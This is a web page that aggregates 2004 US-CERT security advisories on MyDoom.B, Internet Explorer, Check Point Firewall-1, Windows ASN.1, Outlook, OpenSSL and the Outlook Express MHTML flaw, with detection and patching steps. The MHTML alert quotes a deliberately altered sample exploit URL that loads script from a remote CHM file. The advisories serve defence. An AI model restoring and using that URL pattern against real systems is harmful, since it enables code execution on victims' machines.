Home » Security Information

Security Information

This page is dedicated to security, it includes local security information, as well as a number of syndicated security feeds, alerts, tools and news from major security portals. This page aims to provide a single security information access point, helping you stay current with recent security threats. You can check the SG Security FAQ and visit the SG Security forum with any questions you might have.

SG Security Scan

SG Security Articles

Latest Security Advisories (US-CERT)

Any system running Microsoft Windows (Windows 95 and newer) that are used for reading email or accessing peer-to-peer file sharing services.

A new variant of the previously discovered MyDoom virus, MyDoom.B, has been identified. In addition to the common traits of email-borne viruses, this virus may prevent your computer from updating anti-virus and other software.

Quick Links
Protect | Identify | Recover

Protect Your Systems

To protect your systems from infection by this virus, we recommend that you take the following steps. In addition to these steps, US-CERT encourages home users to review the "Home Network Security" and "Home Computer Security" documents.

• Avoid opening attachments from suspicious email messages

Emails sent out by Mydoom.B are generated randomly. The From address may also be spoofed to appear as though the message is from a different address.

The subject of the message will include one of the following:

Delivery Error hello Error Mail Delivery System Mail Transaction Failed

Returned mail Server Report Status Unable to deliver the message

Not all email messages with these subject lines carry the MyDoom.B virus, some may be legitimate status messages.

The message body will include one of the following:

• RANDOMIZED CHARACTERS
• test
• The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
• sendmail daemon reported: Error #804 occured during SMTP session. Partial message has been received.
• The message contains Unicode characters and has been sent as a binary attachment.
• The message contains MIME-encoded graphics and has been sent as a binary attachment.
• Mail transaction failed. Partial message is available.

The attachment will have one of the following filenames:

body doc text document

data file readme message

The filename also contains an extension (.exe, .bat, .scr, .cmd, or .pif). When the attachment is opened, the MyDoom.B virus is launched and the system is infected.

• Run and maintain an antivirus product

It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible.

You may wish to read CERT Incident Note IN-2003-01 for more information on anti-virus software and security issues.

• Do not run programs of unknown origin

Do not download, install, or run a program unless it was written by a person or company that you trust.

Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. The Melissa virus spread precisely because it originated from a familiar email address.

In addition, MyDoom.B attempts to spread through file-sharing services like KaZaA. Peer-to-peer file sharing users should be particularly careful of running software sent to them by other users. This is a commonly used method among intruders attempting to build networks of distributed denial-of-service (DDoS) agents.

• Use a personal firewall

A personal firewall will not necessarily protect your system from an email-borne virus, but a properly configured personal firewall may prevent the virus from downloading additional components or launching attacks against other systems.

How to Identify a MyDoom.B Infection

To confirm that your system has been infected with the MyDoom.B virus, perform the following steps.

• Check the 'hosts' file

MyDoom.B overwrites the Windows 'hosts' file. The file it replaces it with will probably prevent your system from accessing your antivirus vendor's web site as well as some other web sites. You can check your hosts file by following these steps:

Windows NT/2000/XP Systems

1. Click on the Start menu and select Run
2. In the dialog box that appears, type cmd and hit OK (a DOS window should appear)
3. At the prompt in the DOS window type type %windir%\system32\drivers\etc\hosts
4. If you see multiple lines starting with 0.0.0.0, your system is probably infected

Windows 95/98/Me Systems

1. Click on the Start menu and select Run
2. In the dialog box that appears, type command and hit OK (a DOS window should appear)
3. At the prompt in the DOS window type type %windir%\hosts
4. If you see multiple lines starting with 0.0.0.0, your system is probably infected

• Check for files left by the virus

MyDoom.B drops several files on an infected computer. The existence of these files is a good indication of infection. Be aware that thereare legitimate Windows files with names similar to those left by the virus. Only files with these names and in these specific directories indicate an infection.

Windows NT/2000/XP Systems

1. Click on the Start menu, select Search and then select For Files and Folders
2. In the search box type explorer.exe
3. The existence of explorer.exe in the System32 directory (typically C:\Windows\System32) is an indication of infection
4. In the search box type ctfmon.dll
5. The existence of ctfmon.dll in the System32 directory (typically C:\Windows\System32) is another indication of infection

Windows 95/98/Me Systems

1. Click on the Start menu, select Search
2. In the search box type explorer.exe
3. The existence of explorer.exe in the System directory (typically C:\Windows\System) is an indication of infection
4. In the search box type ctfmon.dll
5. The existence of ctfmon.dll in the System directory (typically C:\Windows\System) is another indication of infection

• Examine the Windows Registry

The MyDoom.B virus also makes some changes to the Windows registry. Users who are unfamiliar with the registry should probably skip this step because it may cause serious damage to the operating system if accidental changes are made.

Windows 95/98/Me/NT/2000/XP Systems

1. At a DOS command prompt, type regedit.exe (the registry editor should appear)
2. Search the Registry for the value Explorer=C:\WINDOWS\system32\explorer.exe in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run
3. The existence of this value is an indication of MyDoom.B infection

If Your System is Infected

If your system is infected, you will probably be unable to access your antivirus vendor's web site for assistance due to some changes the virus has made to your system. If this is the case, follow these steps to delete a file installed by the virus (do not do this unless you are infected; it may affect the normal operation of your system):

Windows NT/2000/XP Systems

1. Click on the Start menu and select Run
2. In the dialog box that appears, type del %windir%\system32\drivers\etc\hosts

Windows 95/98/Me Systems

1. Click on the Start menu and select Run
2. In the dialog box that appears, type del %windir%\hosts

After deleting this file, you should be able to access your antivirus vendor's web site, obtain the updates to your antivirus software and perform a full scan of your system. Some antivirus vendors may produce a Removal Tool and make it available on their web site. If your vendor provides such a tool, you may want to use it first.

If you are still unsuccessful at removing the virus, contact your antivirus vendor to obtain further assistance with removal and recovery.

Additional Information

For additional technical details about this virus, please see US-CERT Technical Alert TA04-028A.html

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• January 28, 2004: Initial release
  January 30, 2004: Added formatting, revised content

  Last updated 

Microsoft Windows systems running

• Internet Explorer 5.01
• Internet Explorer 5.50
• Internet Explorer 6

Previous versions that are no longer supported may also be affected.

 

Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow attackers in any location to run programs of their choice on your computer using the same privileges as you have.

Quick Links

Patch Information | Problem Description | References 

Microsoft's Home User Security Bulletin for February 2004 describes three vulnerabilities in Internet Explorer (IE).

Note that in addition to IE, any applications that use IE to interpret HTML documents, such as email programs, may present additional ways for these vulnerabilities to be used. 

These vulnerabilities have different impacts, ranging from disguising the true location of a URL to executing computer commands or code, essentially taking over control of your computer and any data on it. The attacker could exploit this vulnerability by convincing you, the victim, to access a specially crafted HTML document such as a web page or HTML email message. Your computer can be compromised simply by viewing the attacker's HTML document with Internet Explorer. 

 

A technical description of these vulnerabilities is available from US-CERT in TA04-033A and from Microsoft in MS04-004.

Resolution

Apply a patch

Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's Home User Security Bulletin for February 2004.

For additional information, and to receive updates on this alert, go to http://www.us-cert.gov.

References

• US-CERT Technical Alert TA04-033A - <http://www.us-cert.gov/cas/techalerts/TA04-033A.html>
• Microsoft's Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040202_windows.asp>
• Microsoft Security Bulletin MS04-004 - <http://www.microsoft.com/technet/security/bulletin/MS04-004.asp>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-033A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• February 02, 2004: Initial release

  Last updated 

• Check Point Firewall-1 NG FCS
• Check Point Firewall-1 NG FP1
• Check Point Firewall-1 NG FP2
• Check Point Firewall-1 NG FP3, HF2
• Check Point Firewall-1 NG with Application Intelligence R54
• Check Point Firewall-1 NG with Application Intelligence R55

Several versions of Check Point Firewall-1 contain a vulnerability that allows remote attackers to execute arbitrary code with administrative privileges. This allows the attacker to take control of the firewall and the server it runs on.

The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality.

Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().

Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at:

http://xforce.iss.net/xforce/alerts/id/162

The CERT/CC is tracking this issue as VU#790771. This reference number corresponds to CVE candidate CAN-2004-0039.

Impact

This vulnerability allows remote attackers to execute arbitrary code on affected firewalls with administrative privileges, typically "SYSTEM" or "root".

Solution

Apply the patch from Check Point

Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at:

http://www.checkpoint.com/techsupport/alerts/security_server.html

Disable the affected components

Check Point has reported that their products are only affected by this vulnerability if the HTTP Security Servers feature is enabled. Therefore, affected sites may be able to limit their exposure to this vulnerability by disabling HTTP Security Servers or the Application Intelligence component, as appropriate.

This vulnerability was discovered and researched by Mark Dowd of ISS X-Force.

This document was written by Jeffrey P. Lanza.

This document is available from http://www.us-cert.gov/cas/techalerts/TA04-036A.html

Revision History

• 02/05/2004: Initial release
  02/06/2004: Updated Solution section
  02/06/2004: Updated Overview and Impact sections
   

  Last updated 

Systems running Microsoft Windows

Microsoft Windows contains multiple vulnerabilities, the most serious of which could allow attackers to take control of your computer.

Microsoft's updated Home User Security Bulletin for February 2004 describes more vulnerabilities in the Microsoft Windows operating system. Microsoft is tracking these issues as Security Update 828028.

It is unclear at this time how many different ways your computer can be compromised using these vulnerabilities, so we recommend you apply the updates below as soon as possible. A technical description of these vulnerabilities is available from US-CERT in TA04-041A and from Microsoft in MS04-007.

Resolution

Apply a patch

Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's updated Home User Security Bulletin for February 2004.

For additional information, and to receive updates on this alert, go to http://www.us-cert.gov/cas/alerts/SA04-041A.html

References

• US-CERT Technical Alert TA04-041A - <http://www.us-cert.gov/cas/techalerts/TA04-041A.html>
• Microsoft's Updated Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040210_windows.asp>
• Microsoft Security Bulletin MS04-007 - <http://www.microsoft.com/technet/security/bulletin/MS04-007.asp>
• Microsoft Knowledge Base Article 828028: An ASN.1 vulnerability could allow code execution - <http://support.microsoft.com/?kbid=828028>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-041A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• February 10, 2004: Initial release

  Last updated 

Systems running Microsoft Office XP and Outlook 2002

There is a vulnerability in Outlook 2002 that could allow attackers to take control of your computer.

By taking advantage of the way Outlook interprets email links, an attacker may be able to gain control of your computer.

A technical description of these vulnerabilities is available from US-CERT in TA04-070A and from Microsoft in MS04-009.

Resolution

Apply a patch

Microsoft's Office Security Update for March 2004 links to the necessary patches.

References

• US-CERT Technical Alert TA04-070A - <http://www.us-cert.gov/cas/techalerts/TA04-070A.html>
• Microsoft's Office Security Update for March 2004 - <http://www.microsoft.com/security/security_bulletins/20040309_office.asp>
• Microsoft Security Bulletin MS04-009 - <http://www.microsoft.com/technet/security/bulletin/ms04-009.mspx>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-070A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• March 10, 2004: Initial release

  Last updated 

• Applications and systems that use the OpenSSL SSL/TLS library

Several vulnerabilities in the OpenSSL SSL/TLS library could allow an unauthenticated, remote attacker to cause a denial of service.

OpenSSL implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols and includes a general purpose cryptographic library. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications including HTTP, IMAP, POP3, SMTP, and LDAP. OpenSSL is widely deployed across a variety of platforms and systems. In particular, many routers and other types of networking equipment use OpenSSL.

The U.K. National Infrastructure Security Co-ordination Centre (NISCC) and the OpenSSL Project have reported three vulnerabilities in the OpenSSL SSL/TLS library (libssl). Any application or system that uses this library may be affected.

VU#288574 - OpenSSL contains null-pointer assignment in do_change_cipher_spec() function

Versions of OpenSSL from 0.9.6c to 0.9.6k inclusive and 0.9.7a to 0.9.7c inclusive contain a null-pointer assignment in the do_change_cipher_spec() function. By performing a specially crafted SSL/TLS handshake, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application.
(Other resources: OpenSSL Security Advisory (1.), CAN-2004-0079, NISCC/224012/OpenSSL/1)

VU#484726 - OpenSSL does not adequately validate length of Kerberos tickets during SSL/TLS handshake

Versions 0.9.7a, 0.9.7b, and 0.9.7c of OpenSSL do not adequately validate the length of Kerberos tickets (RFC 2712) during an SSL/TLS handshake. OpenSSL is not configured to use Kerberos by default. By performing a specially crafted SSL/TLS handshake with an OpenSSL system configured to use Kerberos, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. OpenSSL 0.9.6 is not affected.
(Other resources: OpenSSL Security Advisory (2.), CAN-2004-0112, NISCC/224012/OpenSSL/2)

VU#465542 - OpenSSL does not properly handle unknown message types

OpenSSL prior to version 0.9.6d does not properly handle unknown SSL/TLS message types. An attacker could cause the application using OpenSSL to enter an infinite loop, which may result in a denial of service in the target application. OpenSSL 0.9.7 is not affected.
(Other resources: CAN-2004-0081, NISCC/224012/OpenSSL/3)

Impact

An unauthenticated, remote attacker could cause a denial of service in any application or system that uses a vulnerable OpenSSL SSL/TLS library.

Solution

Upgrade or Apply a patch from your vendor

Upgrade to OpenSSL 0.9.6m or 0.9.7d. Alternatively, upgrade or apply a patch as specified by your vendor. Note that it is necessary to recompile any applications that are statically linked to the OpenSSL SSL/TLS library.

Appendix A. Vendor Information

Multiple vendors are affected by different combinations of these vulnerabilities. For updated information, please see the Systems Affected sections of VU#288574, VU#484726, and VU#465542.

Appendix B. References

• US-CERT Technical Cyber Security Alert TA04-078A - <http://www.us-cert.gov/cas/techalerts/TA04-078A.html>
• Vulnerability Note VU#288574 - <http://www.kb.cert.org/vuls/id/288574>
• Vulnerability Note VU#484726 - <http://www.kb.cert.org/vuls/id/484726>
• Vulnerability Note VU#465542 - <http://www.kb.cert.org/vuls/id/465542>
• OpenSSL Security Advisory [17 March 2004] - <http://www.openssl.org/news/secadv_20040317.txt>
• NISCC Vulnerability Advisory 224012 - <http://www.uniras.gov.uk/vuls/2004/224012/index.htm>
• CAN-2004-0079 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0079>
• CAN-2004-0112 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0112>
• CAN-2004-0081 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0081>
• RFC 2712 Addition of Kerberos Cipher Suites to Transport Layer Security (TLS) - <http://www.ietf.org/rfc/rfc2712.txt>

These vulnerabilities were researched and reported by the OpenSSL Project and the U.K. National Infrastructure Security Co-ordination Centre (NISCC).

Feedback can be directed to the authors: Art Manion and Damon Morda.

Revision History

• March 18, 2004: Initial release
  March 19, 2004: Added CVE CAN references VU# links
   

  Last updated 

Continuing Threats to Home Users

• Microsoft Windows systems

A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.

There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file.

The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE).

Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.

US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

Impact

By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:.

When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively).

A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html 
(This URL is intentionally modified to avoid detection by anti-virus software.)

In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code.

Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.

Solution

Install a patch

Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disable ITS and MHTML protocol handlers

Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}

Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

Follow good Internet security practices

These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.

• Disable Active scripting and ActiveX controls
  
  NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
  
  Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
  
  Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

   

• Do not follow unsolicited links

  Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

• Maintain updated anti-virus software

  Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see Microsoft Security Bulletin MS04-013.

Appendix B. References

• Vulnerability Note VU#323070 - <http://www.kb.cert.org/vuls/id/323070>
• US-CERT Computer Virus Resources - <http://www.us-cert.gov//reading_room/virus.html>
• CVE CAN-2004-0380 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
• Microsoft Security Bulletin MS04-013 - <http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx>
• Introduction to URL Security Zones - <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
• About Cross-Frame Scripting and Security - <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
• MIME Type Determination in Internet Explorer - <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
• URL Monikers - <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
• Asynchronous Pluggable Protocols - <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
• Microsoft HTML Help 1.4 SDK - <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
• Microsoft Knowledge Base Article 182569 - <http://support.microsoft.com/default.aspx?scid=182569>
• Microsoft Knowledge Base Article 174360 - <http://support.microsoft.com/default.aspx?scid=174360>
• Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633>
• Windows XP Service Pack 2 Technical Preview - <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
• AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>

This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.

Feedback can be directed to the author: Art Manion.

Revision History

• April 8, 2004: Initial release
  April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
  April 23. 2004: Thanked http-equiv April 26, 2004: Further modified sample exploit URL to minimize AV detection

  Last updated